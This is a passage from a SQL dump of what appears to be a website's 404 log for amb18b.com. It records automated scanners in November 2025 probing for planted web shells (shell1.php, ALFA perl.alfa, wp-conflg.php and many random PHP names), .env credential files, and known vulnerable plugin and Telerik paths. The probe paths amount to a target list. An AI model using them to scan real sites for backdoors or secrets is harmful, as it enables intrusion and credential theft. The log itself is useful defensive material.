07:51:22'),(4020,'https://amb18b.com/lx.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:24','2025-11-05 07:51:24'),(4021,'https://amb18b.com/iuoqc.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:25','2025-11-05 07:51:25'),(4022,'https://amb18b.com/1j.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:27','2025-11-05 07:51:27'),(4023,'https://amb18b.com/qufsq.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:28','2025-11-05 07:51:28'),(4024,'https://amb18b.com/155.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:29','2025-11-05 07:51:29'),(4025,'https://amb18b.com/sosu.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:30','2025-11-05 07:51:30'),(4026,'https://amb18b.com/zero.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:32','2025-11-05 07:51:32'),(4027,'https://amb18b.com/667.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:34','2025-11-05 07:51:34'),(4028,'https://amb18b.com/c4.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:35','2025-11-05 07:51:35'),(4029,'https://amb18b.com/700.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:36','2025-11-05 07:51:36'),(4030,'https://amb18b.com/l.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:38','2025-11-05 07:51:38'),(4031,'https://amb18b.com/oddtd.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:39','2025-11-05 07:51:39'),(4032,'https://amb18b.com/v.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:40','2025-11-05 07:51:40'),(4033,'https://amb18b.com/ff.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:41','2025-11-05 07:51:41'),(4034,'https://amb18b.com/0x.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:44','2025-11-05 07:51:44'),(4035,'https://amb18b.com/sx.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:46','2025-11-05 07:51:46'),(4036,'https://amb18b.com/we.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:48','2025-11-05 07:51:48'),(4037,'https://amb18b.com/20025.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:49','2025-11-05 07:51:49'),(4038,'https://amb18b.com/asd67.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:50','2025-11-05 07:51:50'),(4039,'https://amb18b.com/wp.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:53','2025-11-05 07:51:53'),(4040,'https://amb18b.com/wp-good.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:54','2025-11-05 07:51:54'),(4041,'https://amb18b.com/ngek.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:55','2025-11-05 07:51:55'),(4042,'https://amb18b.com/wp-admin/network/wp-conflg.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:57','2025-11-05 07:51:57'),(4043,'https://amb18b.com/3k4.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:58','2025-11-05 07:51:58'),(4044,'https://amb18b.com/file51.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:59','2025-11-05 07:51:59'),(4045,'https://amb18b.com/man.php','48.210.15.48','Direct Access',1,'2025-11-05 07:52:01','2025-11-05 07:52:01'),(4046,'https://amb18b.com/unrubbish.php','48.210.15.48','Direct Access',1,'2025-11-05 07:52:03','2025-11-05 07:52:03'),(4047,'https://amb18b.com/strubbly.php','48.210.15.48','Direct Access',1,'2025-11-05 07:52:04','2025-11-05 07:52:04'),(4048,'https://amb18b.com/tiqdc.php','48.210.15.48','Direct Access',1,'2025-11-05 07:52:05','2025-11-05 07:52:05'),(4049,'https://amb18b.com/hdwta.php','48.210.15.48','Direct Access',1,'2025-11-05 07:52:06','2025-11-05 07:52:06'),(4050,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','74.176.49.2','Invalid Referrer',1,'2025-11-05 09:57:33','2025-11-05 09:57:33'),(4051,'https://amb18b.com/wp-plain.php','74.176.49.2','Invalid Referrer',1,'2025-11-05 09:57:33','2025-11-05 09:57:33'),(4052,'https://amb18b.com/','74.176.49.2','Invalid Referrer',2,'2025-11-05 09:57:36','2025-11-05 09:57:36'),(4053,'https://amb18b.com/alfacgiapi/perl.alfa','74.176.49.2','Invalid Referrer',1,'2025-11-05 09:57:37','2025-11-05 09:57:37'),(4054,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','74.176.49.2','Direct Access',1,'2025-11-05 09:57:38','2025-11-05 09:57:38'),(4055,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','74.176.49.2','Direct Access',1,'2025-11-05 09:57:40','2025-11-05 09:57:40'),(4056,'https://amb18b.com/tiny.php','178.214.246.254','Direct Access',1,'2025-11-05 10:52:49','2025-11-05 10:52:49'),(4057,'https://amb18b.com/wp-admin/css/','62.171.143.144','Invalid Referrer',1,'2025-11-05 11:17:27','2025-11-05 11:17:27'),(4058,'https://amb18b.com//wp-includes/ID3/license.txt','192.9.224.14','Direct Access',1,'2025-11-05 17:11:07','2025-11-05 17:11:07'),(4059,'https://amb18b.com/?author=2','192.9.224.14','Direct Access',1,'2025-11-05 17:11:09','2025-11-05 17:11:09'),(4060,'https://amb18b.com/postnews.php','216.24.219.201','Direct Access',1,'2025-11-05 18:10:26','2025-11-05 18:10:26'),(4061,'https://amb18b.com/wp-admin/postnews.php','216.24.219.143','Direct Access',1,'2025-11-05 18:10:32','2025-11-05 18:10:32'),(4062,'https://amb18b.com/wordpress/','35.237.89.121','Direct Access',1,'2025-11-05 18:19:38','2025-11-05 18:19:38'),(4063,'https://amb18b.com/blog/','35.237.89.121','Direct Access',1,'2025-11-05 18:19:40','2025-11-05 18:19:40'),(4064,'https://amb18b.com/wp/','35.237.89.121','Direct Access',1,'2025-11-05 18:19:41','2025-11-05 18:19:41'),(4065,'https://amb18b.com/old/','35.237.89.121','Direct Access',1,'2025-11-05 18:19:43','2025-11-05 18:19:43'),(4066,'https://amb18b.com/backup/','35.237.89.121','Direct Access',1,'2025-11-05 18:19:44','2025-11-05 18:19:44'),(4067,'https://amb18b.com/new/','35.237.89.121','Direct Access',1,'2025-11-05 18:19:45','2025-11-05 18:19:45'),(4068,'https://amb18b.com/modules/mod_ppc_simple_spotlight/elements/upload_file.php','196.251.87.191','Direct Access',1,'2025-11-05 18:41:56','2025-11-05 18:41:56'),(4069,'https://amb18b.com/?p=29','43.159.145.153','Direct Access',1,'2025-11-05 18:49:33','2025-11-05 18:49:33'),(4070,'https://amb18b.com//wp-includes/ID3/license.txt','157.66.56.146','Direct Access',1,'2025-11-05 21:15:00','2025-11-05 21:15:00'),(4071,'https://amb18b.com/?author=2','157.66.56.146','Direct Access',1,'2025-11-05 21:15:02','2025-11-05 21:15:02'),(4072,'https://amb18b.com/ss.php?f_c=1','104.234.19.108','Direct Access',1,'2025-11-06 04:13:35','2025-11-06 04:13:35'),(4073,'https://amb18b.com/ss.php?f_c=1','216.24.219.207','Direct Access',1,'2025-11-06 04:13:38','2025-11-06 04:13:38'),(4074,'https://amb18b.com/.env','103.250.186.160','Direct Access',1,'2025-11-06 04:18:01','2025-11-06 04:18:01'),(4075,'https://amb18b.com/vendor/htmlawed/htmlawed/htmLawedTest.php','103.250.186.160','Direct Access',1,'2025-11-06 04:18:01','2025-11-06 04:18:01'),(4076,'https://amb18b.com/telerik.web.ui.dialoghandler.aspx','103.250.186.160','Direct Access',1,'2025-11-06 04:18:01','2025-11-06 04:18:01'),(4077,'https://amb18b.com/media/system/js/core.js','34.172.104.183','Direct Access',1,'2025-11-06 06:40:59','2025-11-06 06:40:59'),(4078,'https://amb18b.com/?p=1','142.44.225.180','Direct Access',1,'2025-11-06 07:48:27','2025-11-06 07:48:27'),(4079,'https://amb18b.com/media/system/js/core.js','35.223.165.66','Direct Access',1,'2025-11-06 09:40:47','2025-11-06 09:40:47'),(4080,'https://amb18b.com//wp-includes/wlwmanifest.xml','104.155.160.16','Direct Access',1,'2025-11-06 10:59:18','2025-11-06 10:59:18'),(4081,'https://amb18b.com//?author=2','104.155.160.16','Direct Access',1,'2025-11-06 10:59:19','2025-11-06 10:59:19'),(4082,'https://amb18b.com//?author=3','104.155.160.16','Direct Access',1,'2025-11-06 10:59:20','2025-11-06 10:59:20'),(4083,'https://amb18b.com//wp-includes/ID3/license.txt','143.198.211.8','Direct Access',1,'2025-11-06 13:09:33','2025-11-06 13:09:33'),(4084,'https://amb18b.com/?author=2','143.198.211.8','Direct Access',1,'2025-11-06 13:09:34','2025-11-06 13:09:34'),(4085,'https://amb18b.com/.env','38.43.93.130','Direct Access',1,'2025-11-06 14:15:15','2025-11-06 14:15:15'),(4086,'https://amb18b.com/shoha.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:47','2025-11-06 15:46:47'),(4087,'https://amb18b.com/kaza.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:49','2025-11-06 15:46:49'),(4088,'https://amb18b.com/static/wsd.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:50','2025-11-06 15:46:50'),(4089,'https://amb18b.com/gifclass4.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:52','2025-11-06 15:46:52'),(4090,'https://amb18b.com/info.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:53','2025-11-06 15:46:53'),(4091,'https://amb18b.com/333.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:55','2025-11-06 15:46:55'),(4092,'https://amb18b.com/cfile.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:56','2025-11-06 15:46:56'),(4093,'https://amb18b.com/bless3.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:57','2025-11-06 15:46:57'),(4094,'https://amb18b.com/bless.php','4.216.107.25','Direct Access',1,'2025-11-06 15:46:58','2025-11-06 15:46:58'),(4095,'https://amb18b.com/doti.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:00','2025-11-06 15:47:00'),(4096,'https://amb18b.com/031.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:02','2025-11-06 15:47:02'),(4097,'https://amb18b.com/wfile.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:03','2025-11-06 15:47:03'),(4098,'https://amb18b.com/lala.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:04','2025-11-06 15:47:04'),(4099,'https://amb18b.com/gmo.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:06','2025-11-06 15:47:06'),(4100,'https://amb18b.com/he.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:07','2025-11-06 15:47:07'),(4101,'https://amb18b.com/plss3.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:08','2025-11-06 15:47:08'),(4102,'https://amb18b.com/ton.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:09','2025-11-06 15:47:09'),(4103,'https://amb18b.com/nfile.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:11','2025-11-06 15:47:11'),(4104,'https://amb18b.com/ffile.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:12','2025-11-06 15:47:12'),(4105,'https://amb18b.com/file18.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:13','2025-11-06 15:47:13'),(4106,'https://amb18b.com/file21.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:14','2025-11-06 15:47:14'),(4107,'https://amb18b.com/yellow.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:15','2025-11-06 15:47:15'),(4108,'https://amb18b.com/file1.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:16','2025-11-06 15:47:16'),(4109,'https://amb18b.com/geck.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:18','2025-11-06 15:47:18'),(4110,'https://amb18b.com/file4.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:19','2025-11-06 15:47:19'),(4111,'https://amb18b.com/file88.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:20','2025-11-06 15:47:20'),(4112,'https://amb18b.com/111.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:21','2025-11-06 15:47:21'),(4113,'https://amb18b.com/size.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:22','2025-11-06 15:47:22'),(4114,'https://amb18b.com/bolt.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:23','2025-11-06 15:47:23'),(4115,'https://amb18b.com/file8.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:25','2025-11-06 15:47:25'),(4116,'https://amb18b.com/file2.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:26','2025-11-06 15:47:26'),(4117,'https://amb18b.com/vee.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:27','2025-11-06 15:47:27'),(4118,'https://amb18b.com/a2.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:28','2025-11-06 15:47:28'),(4119,'https://amb18b.com/mlex.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:29','2025-11-06 15:47:29'),(4120,'https://amb18b.com/030.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:31','2025-11-06 15:47:31'),(4121,'https://amb18b.com/haa.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:32','2025-11-06 15:47:32'),(4122,'https://amb18b.com/xsox.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:33','2025-11-06 15:47:33'),(4123,'https://amb18b.com/classgoto24.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:34','2025-11-06 15:47:34'),(4124,'https://amb18b.com/inde.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:36','2025-11-06 15:47:36'),(4125,'https://amb18b.com/akk.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:37','2025-11-06 15:47:37'),(4126,'https://amb18b.com/alpa.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:38','2025-11-06 15:47:38'),(4127,'https://amb18b.com/finny.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:39','2025-11-06 15:47:39'),(4128,'https://amb18b.com/file15.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:40','2025-11-06 15:47:40'),(4129,'https://amb18b.com/0x0x.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:41','2025-11-06 15:47:41'),(4130,'https://amb18b.com/2clas.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:43','2025-11-06 15:47:43'),(4131,'https://amb18b.com/file9.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:44','2025-11-06 15:47:44'),(4132,'https://amb18b.com/aaa.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:45','2025-11-06 15:47:45'),(4133,'https://amb18b.com/ilex.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:46','2025-11-06 15:47:46'),(4134,'https://amb18b.com/tor.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:48','2025-11-06 15:47:48'),(4135,'https://amb18b.com/klex.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:49','2025-11-06 15:47:49'),(4136,'https://amb18b.com/shell1.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:50','2025-11-06 15:47:50'),(4137,'https://amb18b.com/sec.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:52','2025-11-06 15:47:52'),(4138,'https://amb18b.com/filesss.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:53','2025-11-06 15:47:53'),(4139,'https://amb18b.com/ea.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:54','2025-11-06 15:47:54'),(4140,'https://amb18b.com/gi.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:55','2025-11-06 15:47:55'),(4141,'https://amb18b.com/10.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:56','2025-11-06 15:47:56'),(4142,'https://amb18b.com/11.php','4.216.107.25','Direct Access',1,'2025-11-06 15:47:57','2025-11-06 15:47:57'),(4143,'https://amb18b.com/12.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:00','2025-11-06 15:48:00'),(4144,'https://amb18b.com/13.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:02','2025-11-06 15:48:02'),(4145,'https://amb18b.com/hi.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:03','2025-11-06 15:48:03'),(4146,'https://amb18b.com/v.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:04','2025-11-06 15:48:04'),(4147,'https://amb18b.com/ar.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:05','2025-11-06 15:48:05'),(4148,'https://amb18b.com/article.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:06','2025-11-06 15:48:06'),(4149,'https://amb18b.com/install.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:08','2025-11-06 15:48:08'),(4150,'https://amb18b.com/1.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:09','2025-11-06 15:48:09'),(4151,'https://amb18b.com/bak.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:10','2025-11-06 15:48:10'),(4152,'https://amb18b.com/ini.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:11','2025-11-06 15:48:11'),(4153,'https://amb18b.com/mail.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:13','2025-11-06 15:48:13'),(4154,'https://amb18b.com/dlu.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:14','2025-11-06 15:48:14'),(4155,'https://amb18b.com/zde.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:15','2025-11-06 15:48:15'),(4156,'https://amb18b.com/ifm.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:16','2025-11-06 15:48:16'),(4157,'https://amb18b.com/redi.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:17','2025-11-06 15:48:17'),(4158,'https://amb18b.com/fns.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:18','2025-11-06 15:48:18'),(4159,'https://amb18b.com/pent.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:20','2025-11-06 15:48:20'),(4160,'https://amb18b.com/wsx.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:21','2025-11-06 15:48:21'),(4161,'https://amb18b.com/r79.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:22','2025-11-06 15:48:22'),(4162,'https://amb18b.com/mpxct.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:23','2025-11-06 15:48:23'),(4163,'https://amb18b.com/x3.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:24','2025-11-06 15:48:24'),(4164,'https://amb18b.com/wan.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:25','2025-11-06 15:48:25'),(4165,'https://amb18b.com/iov.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:26','2025-11-06 15:48:26'),(4166,'https://amb18b.com/ouh.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:28','2025-11-06 15:48:28'),(4167,'https://amb18b.com/asgtt.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:29','2025-11-06 15:48:29'),(4168,'https://amb18b.com/image.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:30','2025-11-06 15:48:30'),(4169,'https://amb18b.com/wok.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:31','2025-11-06 15:48:31'),(4170,'https://amb18b.com/alexus.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:32','2025-11-06 15:48:32'),(4171,'https://amb18b.com/sadis.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:33','2025-11-06 15:48:33'),(4172,'https://amb18b.com/admir.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:35','2025-11-06 15:48:35'),(4173,'https://amb18b.com/file52.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:36','2025-11-06 15:48:36'),(4174,'https://amb18b.com/133.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:37','2025-11-06 15:48:37'),(4175,'https://amb18b.com/x0.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:39','2025-11-06 15:48:39'),(4176,'https://amb18b.com/wsr2.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:40','2025-11-06 15:48:40'),(4177,'https://amb18b.com/wolv.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:41','2025-11-06 15:48:41'),(4178,'https://amb18b.com/av.php.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:42','2025-11-06 15:48:42'),(4179,'https://amb18b.com/pn.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:43','2025-11-06 15:48:43'),(4180,'https://amb18b.com/error.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:45','2025-11-06 15:48:45'),(4181,'https://amb18b.com/NH19T66T.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:46','2025-11-06 15:48:46'),(4182,'https://amb18b.com/rei.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:48','2025-11-06 15:48:48'),(4183,'https://amb18b.com/666.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:49','2025-11-06 15:48:49'),(4184,'https://amb18b.com/777.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:50','2025-11-06 15:48:50'),(4185,'https://amb18b.com/888.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:51','2025-11-06 15:48:51'),(4186,'https://amb18b.com/555.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:53','2025-11-06 15:48:53'),(4187,'https://amb18b.com/zeal.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:54','2025-11-06 15:48:54'),(4188,'https://amb18b.com/file.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:55','2025-11-06 15:48:55'),(4189,'https://amb18b.com/file5.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:56','2025-11-06 15:48:56'),(4190,'https://amb18b.com/file17.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:57','2025-11-06 15:48:57'),(4191,'https://amb18b.com/file32.php','4.216.107.25','Direct Access',1,'2025-11-06 15:48:58','2025-11-06 15:48:58'),(4192,'https://amb18b.com/file13.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:00','2025-11-06 15:49:00'),(4193,'https://amb18b.com/file3.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:01','2025-11-06 15:49:01'),(4194,'https://amb18b.com/atomlib.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:03','2025-11-06 15:49:03'),(4195,'https://amb18b.com/manager.php/error.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:04','2025-11-06 15:49:04'),(4196,'https://amb18b.com/manager.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:05','2025-11-06 15:49:05'),(4197,'https://amb18b.com/abcd.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:06','2025-11-06 15:49:06'),(4198,'https://amb18b.com/efile.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:07','2025-11-06 15:49:07'),(4199,'https://amb18b.com/520.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:09','2025-11-06 15:49:09'),(4200,'https://amb18b.com/file7.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:10','2025-11-06 15:49:10'),(4201,'https://amb18b.com/2%25.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:11','2025-11-06 15:49:11'),(4202,'https://amb18b.com/1%25.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:12','2025-11-06 15:49:12'),(4203,'https://amb18b.com/wp-freya.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:14','2025-11-06 15:49:14'),(4204,'https://amb18b.com/keu.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:15','2025-11-06 15:49:15'),(4205,'https://amb18b.com/0%25.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:16','2025-11-06 15:49:16'),(4206,'https://amb18b.com/lock360.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:18','2025-11-06 15:49:18'),(4207,'https://amb18b.com/jmfi2.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:19','2025-11-06 15:49:19'),(4208,'https://amb18b.com/class.1.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:20','2025-11-06 15:49:20'),(4209,'https://amb18b.com/an.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:22','2025-11-06 15:49:22'),(4210,'https://amb18b.com/fs.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:23','2025-11-06 15:49:23'),(4211,'https://amb18b.com/CLA.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:25','2025-11-06 15:49:25'),(4212,'https://amb18b.com/gfile.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:26','2025-11-06 15:49:26'),(4213,'https://amb18b.com/file6.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:27','2025-11-06 15:49:27'),(4214,'https://amb18b.com/eauu.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:28','2025-11-06 15:49:28'),(4215,'https://amb18b.com/we.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:29','2025-11-06 15:49:29'),(4216,'https://amb18b.com/fe5.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:30','2025-11-06 15:49:30'),(4217,'https://amb18b.com/cccc.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:32','2025-11-06 15:49:32'),(4218,'https://amb18b.com/gm.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:33','2025-11-06 15:49:33'),(4219,'https://amb18b.com/hexx.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:34','2025-11-06 15:49:34'),(4220,'https://amb18b.com/444.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:35','2025-11-06 15:49:35'),(4221,'https://amb18b.com/lv.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:36','2025-11-06 15:49:36'),(4222,'https://amb18b.com/goat.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:38','2025-11-06 15:49:38'),(4223,'https://amb18b.com/222.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:39','2025-11-06 15:49:39'),(4224,'https://amb18b.com/aa.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:40','2025-11-06 15:49:40'),(4225,'https://amb18b.com/vast.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:42','2025-11-06 15:49:42'),(4226,'https://amb18b.com/cool.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:43','2025-11-06 15:49:43'),(4227,'https://amb18b.com/yanki.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:44','2025-11-06 15:49:44'),(4228,'https://amb18b.com/des.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:46','2025-11-06 15:49:46'),(4229,'https://amb18b.com/ext.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:47','2025-11-06 15:49:47'),(4230,'https://amb18b.com/axx.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:49','2025-11-06 15:49:49'),(4231,'https://amb18b.com/wp-update.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:50','2025-11-06 15:49:50'),(4232,'https://amb18b.com/yasnu.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:51','2025-11-06 15:49:51'),(4233,'https://amb18b.com/new4.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:52','2025-11-06 15:49:52'),(4234,'https://amb18b.com/ava.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:54','2025-11-06 15:49:54'),(4235,'https://amb18b.com/ioxi2.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:55','2025-11-06 15:49:55'),(4236,'https://amb18b.com/gfile1.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:56','2025-11-06 15:49:56'),(4237,'https://amb18b.com/rsnu.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:57','2025-11-06 15:49:57'),(4238,'https://amb18b.com/.well-known/acme-challenge/about.php','4.216.107.25','Direct Access',1,'2025-11-06 15:49:59','2025-11-06 15:49:59'),(4239,'https://amb18b.com/default.php','4.216.107.25','Direct Access',1,'2025-11-06 15:50:00','2025-11-06 15:50:00'),(4240,'https://amb18b.com/dfre.php','4.216.107.25','Direct Access',1,'2025-11-06 15:50:01','2025-11-06 15:50:01'),(4241,'https://amb18b.com/pp.php','4.216.107.25','Direct Access',1,'2025-11-06 15:50:02','2025-11-06 15:50:02'),(4242,'https://amb18b.com/usep.php','4.216.107.25','Direct Access',1,'2025-11-06 15:50:03','2025-11-06 15:50:03'),(4243,'https://amb18b.com/3.php','4.216.107.25','Direct Access',1,'2025-11-06 15:50:05','2025-11-06 15:50:05'),(4244,'https://amb18b.com/wp/','34.139.176.8','Direct Access',1,'2025-11-06 18:33:54','2025-11-06 18:33:54'),(4245,'https://amb18b.com/old/','34.139.176.8','Direct Access',1,'2025-11-06 18:33:56','2025-11-06 18:33:56'),(4246,'https://amb18b.com/backup/','34.139.176.8','Direct Access',1,'2025-11-06 18:33:58','2025-11-06 18:33:58'),(4247,'https://amb18b.com/new/','34.139.176.8','Direct Access',1,'2025-11-06 18:33:59','2025-11-06 18:33:59'),(4248,'https://amb18b.com/blog/','34.139.176.8','Direct Access',1,'2025-11-06 18:34:02','2025-11-06 18:34:02'),(4249,'https://amb18b.com/wordpress/','34.139.176.8','Direct Access',1,'2025-11-06 18:34:03','2025-11-06 18:34:03'),(4250,'https://amb18b.com/media/system/js/core.js','34.11.67.17','Direct Access',1,'2025-11-07 06:56:06','2025-11-07 06:56:06'),(4251,'https://amb18b.com/graphql','159.89.12.166','Direct Access',1,'2025-11-07 07:13:51','2025-11-07 07:13:51'),(4252,'https://amb18b.com/api','159.89.12.166','Direct Access',1,'2025-11-07 07:13:53','2025-11-07 